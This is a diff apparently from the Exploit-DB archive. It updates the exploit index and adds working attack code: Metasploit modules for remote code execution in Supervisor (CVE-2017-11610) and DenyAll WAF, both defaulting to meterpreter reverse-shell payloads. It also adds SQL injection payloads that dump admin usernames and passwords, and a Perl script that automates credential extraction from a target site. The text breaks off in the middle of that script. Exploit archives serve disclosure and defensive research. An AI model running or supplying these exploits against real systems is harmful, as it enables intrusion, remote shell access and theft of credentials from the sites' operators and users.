@@ -36825,7 +36829,7 @@ id,file,description,date,author,platform,type,port 38828,platforms/php/webapps/38828.php,"Limonade Framework - 'limonade.php' Local File Disclosure",2013-11-17,"Yashar shahinzadeh",php,webapps,0 38830,platforms/php/webapps/38830.txt,"MyCustomers CMS 1.3.873 - SQL Injection",2015-11-30,"Persian Hack Team",php,webapps,80 38833,platforms/linux/webapps/38833.txt,"Kodi 15 - Arbitrary File Access (Web Interface)",2015-12-01,"Machiel Pronk",linux,webapps,0 -38840,platforms/hardware/webapps/38840.txt,"Belkin N150 Wireless Home Router F9K1009 v1 - Multiple Vulnerabilities",2015-12-01,"Rahul Pratap Singh",hardware,webapps,80 +38840,platforms/hardware/webapps/38840.txt,"Belkin N150 Wireless Router F9K1009 v1 - Multiple Vulnerabilities",2015-12-01,"Rahul Pratap Singh",hardware,webapps,80 38841,platforms/php/webapps/38841.txt,"ZenPhoto 1.4.10 - Local File Inclusion",2015-12-01,hyp3rlinx,php,webapps,80 38842,platforms/php/webapps/38842.txt,"Testa OTMS - Multiple SQL Injections",2013-11-13,"Ashiyane Digital Security Team",php,webapps,0 38843,platforms/php/webapps/38843.txt,"TomatoCart 1.1.8.2 - 'class' Parameter Local File Inclusion",2013-11-18,Esac,php,webapps,0 @@ -37109,7 +37113,7 @@ id,file,description,date,author,platform,type,port 39352,platforms/php/webapps/39352.txt,"Fonality trixbox - 'index.php' Remote Code Execution",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps,0 39354,platforms/php/webapps/39354.pl,"Ramui Forum Script 9.0 - SQL Injection",2016-01-28,bd0rk,php,webapps,80 39355,platforms/php/webapps/39355.txt,"Ramui Web Hosting Directory Script 4.0 - Remote File Inclusion",2016-01-28,bd0rk,php,webapps,80 -39356,platforms/hardware/webapps/39356.py,"Netgear WNR1000v4 - Authentication Bypass",2016-01-28,"Daniel Haake",hardware,webapps,80 +39356,platforms/hardware/webapps/39356.py,"NETGEAR WNR1000v4 - Authentication Bypass",2016-01-28,"Daniel Haake",hardware,webapps,80 39382,platforms/multiple/webapps/39382.txt,"SAP HANA 1.00.095 - hdbindexserver Memory Corruption",2016-01-28,ERPScan,multiple,webapps,0 39384,platforms/php/webapps/39384.txt,"WordPress Plugin Simple Add Pages or Posts 1.6 - Cross-Site Request Forgery",2016-01-29,ALIREZA_PROMIS,php,webapps,0 39385,platforms/php/webapps/39385.txt,"ProjectSend r582 - Multiple Vulnerabilities",2016-01-29,"Filippo Cavallarin",php,webapps,80 @@ -37125,7 +37129,7 @@ id,file,description,date,author,platform,type,port 39409,platforms/hardware/webapps/39409.txt,"D-Link DVG­N5402SP - Multiple Vulnerabilities",2016-02-04,"Karn Ganeshen",hardware,webapps,0 39410,platforms/php/webapps/39410.txt,"WordPress Plugin User Meta Manager 3.4.6 - Blind SQL Injection",2016-02-04,"Panagiotis Vagenas",php,webapps,80 39411,platforms/php/webapps/39411.txt,"WordPress Plugin User Meta Manager 3.4.6 - Privilege Escalation",2016-02-04,"Panagiotis Vagenas",php,webapps,80 -39412,platforms/hardware/webapps/39412.txt,"Netgear ProSafe Network Management System NMS300 - Multiple Vulnerabilities",2016-02-04,"Pedro Ribeiro",hardware,webapps,0 +39412,platforms/hardware/webapps/39412.txt,"NETGEAR NMS300 ProSafe Network Management System - Multiple Vulnerabilities",2016-02-04,"Pedro Ribeiro",hardware,webapps,0 39413,platforms/php/webapps/39413.txt,"UliCMS v9.8.1 - SQL Injection",2016-02-04,"Manuel García Cárdenas",php,webapps,80 39414,platforms/php/webapps/39414.txt,"OpenDocMan 1.3.4 - Cross-Site Request Forgery",2016-02-04,"Curesec Research Team",php,webapps,80 39415,platforms/php/webapps/39415.txt,"ATutor 2.2 - Multiple Cross-Site Scripting Vulnerabilities",2016-02-04,"Curesec Research Team",php,webapps,80 @@ -37609,8 +37613,8 @@ id,file,description,date,author,platform,type,port 40856,platforms/hardware/webapps/40856.txt,"Xfinity Gateway - Remote Code Execution",2016-12-02,"Gregory Smiley",hardware,webapps,0 40877,platforms/php/webapps/40877.txt,"AbanteCart 1.2.7 - Cross-Site Scripting",2016-12-06,"Kacper Szurek",php,webapps,0 40887,platforms/hardware/webapps/40887.txt,"Cisco Unified Communications Manager 7/8/9 - Directory Traversal",2016-12-07,justpentest,hardware,webapps,0 -40889,platforms/cgi/webapps/40889.txt,"Netgear R7000 - Command Injection",2016-12-07,Acew0rm,cgi,webapps,0 -40898,platforms/hardware/webapps/40898.txt,"Netgear R7000 - Cross-Site Scripting",2016-12-11,"Vincent Yiu",hardware,webapps,0 +40889,platforms/cgi/webapps/40889.txt,"NETGEAR R7000 - Command Injection",2016-12-07,Acew0rm,cgi,webapps,0 +40898,platforms/hardware/webapps/40898.txt,"NETGEAR R7000 - Cross-Site Scripting",2016-12-11,"Vincent Yiu",hardware,webapps,0 40901,platforms/hardware/webapps/40901.txt,"ARG-W4 ADSL Router - Multiple Vulnerabilities",2016-12-11,"Persian Hack Team",hardware,webapps,0 40904,platforms/php/webapps/40904.txt,"Smart Guard Network Manager 6.3.2 - SQL Injection",2016-12-03,"Rahul Raz",php,webapps,0 40908,platforms/php/webapps/40908.html,"WordPress Plugin Multisite Post Duplicator 0.9.5.1 - Cross-Site Request Forgery",2016-12-12,dxw,php,webapps,80 @@ -37926,7 +37930,7 @@ id,file,description,date,author,platform,type,port 41399,platforms/php/webapps/41399.txt,"Joomla! Component MaQma Helpdesk 4.2.7 - 'id' Parameter SQL Injection",2017-02-20,"Ihsan Sencan",php,webapps,0 41400,platforms/php/webapps/41400.txt,"Joomla! Component PayPal IPN for DOCman 3.1 - 'id' Parameter SQL Injection",2017-02-20,"Ihsan Sencan",php,webapps,0 41401,platforms/ios/webapps/41401.txt,"Album Lock 4.0 iOS - Directory Traversal",2017-02-20,Vulnerability-Lab,ios,webapps,0 -41402,platforms/hardware/webapps/41402.txt,"Tenda N3 Wireless N150 Home Router - Authentication Bypass",2015-09-03,"Mandeep Jadon",hardware,webapps,0 +41402,platforms/hardware/webapps/41402.txt,"Tenda N3 Wireless N150 Router - Authentication Bypass",2015-09-03,"Mandeep Jadon",hardware,webapps,0 41595,platforms/php/webapps/41595.txt,"Car Workshop System - SQL Injection",2017-03-13,"Ihsan Sencan",php,webapps,0 41404,platforms/hardware/webapps/41404.html,"DIGISOL DG-HR1400 Wireless Router - Cross-Site Request Forgery",2017-02-21,Indrajith.A.N,hardware,webapps,0 41405,platforms/php/webapps/41405.txt,"Joomla! Component J-HotelPortal 6.0.2 - 'review_id' Parameter SQL Injection",2017-02-21,"Ihsan Sencan",php,webapps,0 @@ -38545,3 +38549,11 @@ id,file,description,date,author,platform,type,port 42755,platforms/php/webapps/42755.txt,"Tecnovision DLX Spot - Arbitrary File Upload",2017-05-19,"Simon Brannstrom",php,webapps,0 42761,platforms/php/webapps/42761.txt,"PHPMyFAQ 2.9.8 - Cross-Site Scripting",2017-09-21,"Ishaq Mohammed",php,webapps,0 42768,platforms/php/webapps/42768.pl,"Stock Photo Selling 1.0 - SQL Injection",2017-09-22,"Ihsan Sencan",php,webapps,0 +42769,platforms/linux/webapps/42769.rb,"DenyAll WAF < 6.3.0 - Remote Code Execution (Metasploit)",2017-09-19,"Mehmet Ince",linux,webapps,0 +42770,platforms/php/webapps/42770.txt,"Lending And Borrowing - 'pid' Parameter SQL Injection",2017-09-22,"Ihsan Sencan",php,webapps,0 +42771,platforms/php/webapps/42771.txt,"Multi Level Marketing - SQL Injection",2017-09-22,"Ihsan Sencan",php,webapps,0 +42772,platforms/php/webapps/42772.pl,"Cash Back Comparison Script 1.0 - SQL Injection",2017-09-22,"Ihsan Sencan",php,webapps,0 +42773,platforms/php/webapps/42773.txt,"Claydip Airbnb Clone 1.0 - Arbitrary File Upload",2017-09-22,"Ihsan Sencan",php,webapps,0 +42774,platforms/php/webapps/42774.txt,"Secure E-commerce Script 1.02 - 'sid' Parameter SQL Injection",2017-09-22,8bitsec,php,webapps,0 +42775,platforms/php/webapps/42775.txt,"PHP Auction Ecommerce Script 1.6 - SQL Injection",2017-09-22,8bitsec,php,webapps,0 +42776,platforms/asp/webapps/42776.txt,"JitBit HelpDesk < 9.0.2 - Authentication Bypass",2017-09-22,Kc57,asp,webapps,0 diff --git a/platforms/asp/webapps/42776.txt b/platforms/asp/webapps/42776.txt new file mode 100755 index 000000000..a1fd26535 --- /dev/null +++ b/platforms/asp/webapps/42776.txt @@ -0,0 +1,13 @@ +# Exploit Title: JitBit HelpDesk <= 9.0.2 Broken Authentication +# Google Dork: "Powered by Jitbit HelpDesk" -site:jitbit.com +# Date: 09/22/2017 +# Exploit Author: Rob Simon (Kc57) - TrustedSec www.trustedsec.com +# Vendor Homepage: https://www.jitbit.com/helpdesk/ +# Download Link: https://static.jitbit.com/HelpDeskTrial.zip +# Version: 9.0.2 +# Tested on: Windows Server 2012 +# CVE : NA + +Proof of Concept: + +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42776.zip \ No newline at end of file diff --git a/platforms/linux/remote/42779.rb b/platforms/linux/remote/42779.rb new file mode 100755 index 000000000..68f9aee33 --- /dev/null +++ b/platforms/linux/remote/42779.rb @@ -0,0 +1,169 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::CmdStager + + def initialize(info={}) + super(update_info(info, + 'Name' => "Supervisor XML-RPC Authenticated Remote Code Execution", + 'Description' => %q{ + This module exploits a vulnerability in the Supervisor process control software, where an authenticated client + can send a malicious XML-RPC request to supervisord that will run arbitrary shell commands on the server. + The commands will be run as the same user as supervisord. Depending on how supervisord has been configured, this + may be root. This vulnerability can only be exploited by an authenticated client, or if supervisord has been + configured to run an HTTP server without authentication. This vulnerability affects versions 3.0a1 to 3.3.2. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Calum Hutton ' + ], + 'References' => + [ + ['URL', 'https://github.com/Supervisor/supervisor/issues/964'], + ['URL', 'https://www.debian.org/security/2017/dsa-3942'], + ['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11610'], + ['URL', 'https://github.com/phith0n/vulhub/tree/master/supervisor/CVE-2017-11610'], + ['CVE', '2017-11610'] + ], + 'Platform' => 'linux', + 'Targets' => + [ + ['3.0a1-3.3.2', {}] + ], + 'Arch' => [ ARCH_X86, ARCH_X64 ], + 'DefaultOptions' => + { + 'RPORT' => 9001, + 'Payload' => 'linux/x64/meterpreter/reverse_tcp', + }, + 'Privileged' => false, + 'DisclosureDate' => 'Jul 19 2017', + 'DefaultTarget' => 0 + )) + + register_options( + [ + Opt::RPORT(9001), + OptString.new('HttpUsername', [false, 'Username for HTTP basic auth']), + OptString.new('HttpPassword', [false, 'Password for HTTP basic auth']), + OptString.new('TARGETURI', [true, 'The path to the XML-RPC endpoint', '/RPC2']), + ] + ) + end + + def check_version(version) + if version <= Gem::Version.new('3.3.2') and version >= Gem::Version.new('3.0a1') + return true + else + return false + end + end + + def check + + print_status('Extracting version from web interface..') + + params = { + 'method' => 'GET', + 'uri' => normalize_uri('/') + } + if !datastore['HttpUsername'].to_s.empty? and !datastore['HttpPassword'].to_s.empty? + print_status("Using basic auth (#{datastore['HttpUsername']}:#{datastore['HttpPassword']})") + params.merge!({'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword'])}) + end + res = send_request_cgi(params) + + if res + if res.code == 200 + match = res.body.match(/(\d+\.[\dab]\.\d+)<\/span>/) + if match + version = Gem::Version.new(match[1]) + if check_version(version) + print_good("Vulnerable version found: #{version}") + return Exploit::CheckCode::Appears + else + print_bad("Version #{version} is not vulnerable") + return Exploit::CheckCode::Safe + end + else + print_bad('Could not extract version number from web interface') + return Exploit::CheckCode::Unknown + end + elsif res.code == 401 + print_bad("Authentication failed: #{res.code} response") + return Exploit::CheckCode::Safe + else + print_bad("Unexpected HTTP code: #{res.code} response") + return Exploit::CheckCode::Unknown + end + else + print_bad('Error connecting to web interface') + return Exploit::CheckCode::Unknown + end + + end + + def execute_command(cmd, opts = {}) + + # XML-RPC payload template, use nohup and & to detach and background the process so it doesnt hangup the web server + # Credit to the following urls for the os.system() payload + # https://github.com/phith0n/vulhub/tree/master/supervisor/CVE-2017-11610 + # https://www.leavesongs.com/PENETRATION/supervisord-RCE-CVE-2017-11610.html + xml_payload = %{ + + supervisor.supervisord.options.warnings.linecache.os.system + + + echo -n #{Rex::Text.encode_base64(cmd)}|base64 -d|nohup bash > /dev/null 2>&1 & + + +} + + # Send the XML-RPC payload via POST to the specified endpoint + endpoint_path = target_uri.path + print_status("Sending XML-RPC payload via POST to #{peer}#{datastore['TARGETURI']}") + + params = { + 'method' => 'POST', + 'uri' => normalize_uri(endpoint_path), + 'ctype' => 'text/xml', + 'headers' => {'Accept' => 'text/xml'}, + 'data' => xml_payload, + 'encode_params' => false + } + if !datastore['HttpUsername'].to_s.empty? and !datastore['HttpPassword'].to_s.empty? + print_status("Using basic auth (#{datastore['HttpUsername']}:#{datastore['HttpPassword']})") + params.merge!({'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword'])}) + end + return send_request_cgi(params, timeout=5) + + end + + def exploit + + res = execute_cmdstager(:linemax => 800) + + if res + if res.code == 401 + fail_with(Failure::NoAccess, "Authentication failed: #{res.code} response") + elsif res.code == 404 + fail_with(Failure::NotFound, "Invalid XML-RPC endpoint: #{res.code} response") + else + fail_with(Failure::UnexpectedReply, "Unexpected HTTP code: #{res.code} response") + end + else + print_good('Request returned without status code, usually indicates success. Passing to handler..') + handler + end + + end + +end \ No newline at end of file diff --git a/platforms/linux/webapps/42769.rb b/platforms/linux/webapps/42769.rb new file mode 100755 index 000000000..a43ad8f9a --- /dev/null +++ b/platforms/linux/webapps/42769.rb @@ -0,0 +1,103 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info={}) + super(update_info(info, + 'Name' => "DenyAll Web Application Firewall Remote Code Execution", + 'Description' => %q{ + This module exploits the command injection vulnerability of DenyAll Web Application Firewall. Unauthenticated users can execute a + terminal command under the context of the web server user. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Mehmet Ince ' # author & msf module + ], + 'References' => + [ + ['URL', 'https://pentest.blog/advisory-denyall-web-application-firewall-unauthenticated-remote-code-execution/'] + ], + 'DefaultOptions' => + { + 'SSL' => true, + 'RPORT' => 3001, + 'Payload' => 'python/meterpreter/reverse_tcp' + }, + 'Platform' => ['python'], + 'Arch' => ARCH_PYTHON, + 'Targets' => [[ 'Automatic', { }]], + 'Privileged' => false, + 'DisclosureDate' => "Sep 19 2017", + 'DefaultTarget' => 0 + )) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The URI of the vulnerable DenyAll WAF', '/']) + ] + ) + end + + def get_token + # Taking token by exploiting bug on first endpoint. + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'webservices', 'download', 'index.php'), + 'vars_get' => { + 'applianceUid' => 'LOCALUID', + 'typeOf' => 'debug' + } + }) + + if res && res.code == 200 && res.body.include?("iToken") + res.body.scan(/"iToken";s:32:"([a-z][a-f0-9]{31})";/).flatten[0] + else + nil + end + end + + def check + # If we've managed to get token, that means target is most likely vulnerable. + token = get_token + if token.nil? + Exploit::CheckCode::Safe + else + Exploit::CheckCode::Appears + end + end + + def exploit + # Get iToken from unauthenticated accessible endpoint + print_status('Extracting iToken value') + token = get_token + + if token.nil? + fail_with(Failure::NotVulnerable, "Target is not vulnerable.") + else + print_good("Awesome. iToken value = #{token}") + end + + # Accessing to the vulnerable second endpoint where we have command injection with valid iToken + print_status('Trigerring command injection vulnerability with iToken value.') + r = rand_text_alpha(5 + rand(3)); + + send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'webservices', 'stream', 'tail.php'), + 'vars_post' => { + 'iToken' => token, + 'tag' => 'tunnel', + 'stime' => r, + 'type' => "#{r}$(python -c \"#{payload.encoded}\")" + } + }) + + end +end diff --git a/platforms/php/webapps/42761.txt b/platforms/php/webapps/42761.txt index af517c350..c6d232cb6 100755 --- a/platforms/php/webapps/42761.txt +++ b/platforms/php/webapps/42761.txt @@ -33,6 +33,5 @@ Steps to Reproduce: 3. Solution: -The issue is now patched by the vendor -https://github.com/thorsten/phpMyFAQ/commit/30b0025e19bd95ba28f4eff4d259671e7bb6bb86 +This vulnerability will be fixed in phpMyFAQ 2.9.9 diff --git a/platforms/php/webapps/42770.txt b/platforms/php/webapps/42770.txt new file mode 100755 index 000000000..ef85b4048 --- /dev/null +++ b/platforms/php/webapps/42770.txt @@ -0,0 +1,27 @@ +# # # # # +# Exploit Title: Lending And Borrowing Script - SQL Injection +# Dork: N/A +# Date: 22.09.2017 +# Vendor Homepage: http://www.i-netsolution.com/ +# Software Link: http://www.i-netsolution.com/product/lending-borrowing-script/ +# Demo: http://74.124.215.220/~realfund/ +# Version: N/A +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# http://localhost/[PATH]/single-cause.php?pid=[SQL] +# +# -22'++/*!00002UNION*/(/*!00002SELECT*/+0x283129,0x283229,0x283329,0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,(/*!00002SELECT*/+GROUP_CONCAT(0x557365726e616d653a,username,0x506173733a,password+SEPARATOR+0x3c62723e)+FROM+admin),0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229,0x28323329,0x28323429,0x28323529,0x28323629,0x28323729,0x28323829,0x28323929,0x28333029,0x28333129,0x28333229,0x28333329,0x28333429,0x28333529,0x28333629,0x28333729,0x28333829,0x28333929,0x28343029,0x28343129,0x28343229,0x28343329,0x28343429,0x28343529,0x28343629,0x28343729)--+- +# +# Etc.. +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/42771.txt b/platforms/php/webapps/42771.txt new file mode 100755 index 000000000..bccecc703 --- /dev/null +++ b/platforms/php/webapps/42771.txt @@ -0,0 +1,30 @@ +# # # # # +# Exploit Title: Multi Level Marketing Script - SQL Injection +# Dork: N/A +# Date: 22.09.2017 +# Vendor Homepage: http://www.i-netsolution.com/ +# Software Link: http://www.i-netsolution.com/product/multi-level-marketing-script/ +# Demo: http://74.124.215.220/~advaemlm/ +# Version: N/A +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# http://localhost/[PATH]/service_detail.php?pid=[SQL] +# +# -8'++/*!00002UNION*/+/*!00002ALL*/+/*!00002SELECT*/+0x31,0x494853414e2053454e43414e,0x33,0x34,0x35,0x36,0x37,0x38,0x39,0x307833313330,0x3131,(/*!00002SELECT*/+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+/*!00002FROM*/+INFORMATION_SCHEMA.TABLES+/*!00002WHERE*/+TABLE_SCHEMA=DATABASE()),0x3133,0x3134,0x3135,0x3136,0x3137--+- +# +# http://localhost/[PATH]/news_detail.php?newid=[SQL] +# http://localhost/[PATH]/event_detail.php?eventid=[SQL] +# +# Etc.. +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/42772.pl b/platforms/php/webapps/42772.pl new file mode 100755 index 000000000..096dbd118 --- /dev/null +++ b/platforms/php/webapps/42772.pl @@ -0,0 +1,59 @@ +#!/usr/bin/perl -w +# # # # # +# Exploit Title: Cash Back Comparison Script 1.0 - SQL Injection +# Dork: N/A +# Date: 22.09.2017 +# Vendor Homepage: http://cashbackcomparisonscript.com/ +# Software Link: http://cashbackcomparisonscript.com/demo/features/ +# Demo: http://www.cashbackcomparison.info/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2017-14703 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +sub clear{ +system(($^O eq 'MSWin32') ? 'cls' : 'clear'); } +clear(); +print " +################################################################################ + #### ## ## ###### ### ## ## + ## ## ## ## ## ## ## ### ## + ## ## ## ## ## ## #### ## + ## ######### ###### ## ## ## ## ## + ## ## ## ## ######### ## #### + ## ## ## ## ## ## ## ## ### + #### ## ## ###### ## ## ## ## + + ###### ######## ## ## ###### ### ## ## + ## ## ## ### ## ## ## ## ## ### ## + ## ## #### ## ## ## ## #### ## + ###### ###### ## ## ## ## ## ## ## ## ## + ## ## ## #### ## ######### ## #### + ## ## ## ## ### ## ## ## ## ## ### + ###### ######## ## ## ###### ## ## ## ## + Cash Back Comparison Script 1.0 - SQL Injection +################################################################################ +"; +use LWP::UserAgent; +print "\nInsert Target:[http://site.com/path/]: "; +chomp(my $target=); +print "\n[!] Exploiting Progress.....\n"; +print "\n"; +$cc="/*!01116concat*/(0x3c74657874617265613e,0x557365726e616d653a,username,0x20,0x506173733a,password,0x3c2f74657874617265613e)"; +$tt="users"; +$b = LWP::UserAgent->new() or die "Could not initialize browser\n"; +$b->agent('Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0'); +$host = $target . "search/EfE'+/*!01116UNIoN*/+/*!01116SeLecT*/+0x31,0x32,0x33,0x34,0x35,0x36,".$cc.",0x38/*!50000FrOm*/".$tt."--+-.html"; +$res = $b->request(HTTP::Request->new(GET=>$host)); +$answer = $res->content; if ($answer =~/